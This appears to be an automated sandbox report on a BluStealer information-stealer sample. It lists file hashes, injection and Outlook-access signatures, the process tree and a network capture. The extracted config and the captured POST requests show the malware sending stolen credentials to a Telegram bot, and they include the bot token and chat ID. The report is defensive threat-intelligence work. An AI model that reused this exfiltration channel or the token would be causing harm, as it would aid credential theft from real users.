Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20221111-en locale:en-us os:windows10-2004-x64 system
  • submitted
    22-11-2022 05:31

General

  • Target

    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe

  • Size

    1.2MB

  • MD5

    7f7ef456450f254a7bbb162af495a3d2

  • SHA1

    b957c8cc73f9cc83cf1519a628b2f8382d52befc

  • SHA256

    02a4055e2fce4b14d2a07f2625c2329309c01dea5499294405ca78e1d800bd78

  • SHA512

    a481c5de7cf000d30f6a28d4f8d6712295d6de062f64722ff264b423ae37d55dafba35676d63ed4ee68e465c1ce39082e4e48ad960f31a072d6c77f94bd731c6

  • SSDEEP

    24576:wM+L74mBfNUstzoh04C14jT7cIxSFD075acQrFclsFVTJWR22n8W5enV3mmb3r8n:f+ejTBC05lQrF6sFVTJkj8W5enV3mOI

Malware Config

Extracted

Family

blustealer

C2

https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage?chat_id=1251788325

Signatures

  • BluStealer

    A modular information stealer written in Visual Basic.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3076
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        3⤵
        • Accesses Microsoft Outlook profiles
        • outlook_office_path
        • outlook_win_path
        PID:952

Network

  • flag-unknown
    DNS
    151.122.125.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    151.122.125.40.in-addr.arpa
    IN PTR
    Response
  • flag-unknown
    DNS
    api.telegram.org
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-unknown
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Content-Length: 167
    Host: api.telegram.org
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 22 Nov 2022 05:32:17 GMT
    Content-Type: application/json
    Content-Length: 404
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-unknown
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 201
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 22 Nov 2022 05:32:48 GMT
    Content-Type: application/json
    Content-Length: 81
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-unknown
    DNS
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    IN PTR
    Response
  • flag-unknown
    DNS
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    8.8.8.8:53
    Request
    crl.godaddy.com
    IN A
    Response
    crl.godaddy.com
    IN CNAME
    gdcrl.godaddy.com.akadns.net
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.36
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.41
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.31
  • flag-unknown
    GET
    http://crl.godaddy.com/gdroot.crl
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    192.124.249.31:80
    Request
    GET /gdroot.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: crl.godaddy.com
    Response
    HTTP/1.1 200 OK
    Server: Sucuri/Cloudproxy
    Date: Tue, 22 Nov 2022 05:33:15 GMT
    Content-Type: application/x-pkcs7-crl
    Content-Length: 429
    Connection: keep-alive
    X-Sucuri-ID: 19031
    Last-Modified: Mon, 27 Jun 2022 22:00:33 GMT
    ETag: "1ad-5e2750c919e0b"
    Cache-Control: public, no-transform, must-revalidate
    Expires: Wed, 29 Jun 2022 08:23:08 GMT
    P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
    X-Sucuri-Cache: HIT
    Accept-Ranges: bytes
  • flag-unknown
    GET
    http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    Remote address:
    192.124.249.41:80
    Request
    GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: ocsp.godaddy.com
    Response
    HTTP/1.1 200 OK
    Server: Sucuri/Cloudproxy
    Date: Tue, 22 Nov 2022 05:33:21 GMT
    Content-Type: application/ocsp-response
    Content-Length: 1697
    Connection: keep-alive
    X-Sucuri-ID: 19041
    Content-Transfer-Encoding: Binary
    Cache-Control: public, no-transform, must-revalidate
    Last-Modified: Mon, 21 Nov 2022 20:10:13 GMT
    Expires: Tue, 22 Nov 2022 20:10:13 GMT
    ETag: "18a2bef6d3bd326990faa7d41a031ae2978128cb"
    P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
    X-Sucuri-Cache: HIT
  • 8.238.24.126:80
    322 B
    7
  • 8.238.24.126:80
    322 B
    7
  • 8.238.24.126:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 20.42.65.85:443
    322 B
    7
  • 87.248.202.1:80
    322 B
    7
  • 87.248.202.1:80
    322 B
    7
  • 87.248.202.1:80
    322 B
    7
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    tls, http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    1.3kB
    7.1kB
    11
    11

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin
    tls, http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    1.7kB
    6.7kB
    14
    11

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::FXOYPAIQ\Admin

    HTTP Response

    400
  • 192.124.249.36:80
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    260 B
    5
  • 192.124.249.36:80
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    260 B
    5
  • 192.124.249.41:80
    crl.godaddy.com
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    260 B
    5
  • 192.124.249.31:80
    http://crl.godaddy.com/gdroot.crl
    http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    310 B
    1.1kB
    4
    3

    HTTP Request

    GET http://crl.godaddy.com/gdroot.crl

    HTTP Response

    200
  • 192.124.249.41:80
    http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
    http
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    404 B
    2.4kB
    4
    4

    HTTP Request

    GET http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D

    HTTP Response

    200
  • 8.8.8.8:53
    151.122.125.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    151.122.125.40.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    dns
    118 B
    204 B
    1
    1

    DNS Request

    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa

  • 8.8.8.8:53
    crl.godaddy.com
    dns
    SecuriteInfo.com.Trojan.Packed2.44634.20056.30170.exe
    61 B
    151 B
    1
    1

    DNS Request

    crl.godaddy.com

    DNS Response

    192.124.249.36
    192.124.249.41
    192.124.249.31

MITRE ATT&CK Enterprise v6

Downloads

  • memory/952-145-0x0000000000E10000-0x0000000000E76000-memory.dmp

    Filesize

    408KB

  • memory/3076-132-0x0000000000120000-0x000000000024E000-memory.dmp

    Filesize

    1.2MB

  • memory/3076-133-0x00000000052D0000-0x0000000005874000-memory.dmp

    Filesize

    5.6MB

  • memory/3076-134-0x0000000004D20000-0x0000000004DB2000-memory.dmp

    Filesize

    584KB

  • memory/3076-135-0x0000000004CF0000-0x0000000004CFA000-memory.dmp

    Filesize

    40KB

  • memory/3076-136-0x0000000007460000-0x00000000074FC000-memory.dmp

    Filesize

    624KB

  • memory/4108-138-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/4108-140-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/4108-143-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/4108-146-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB
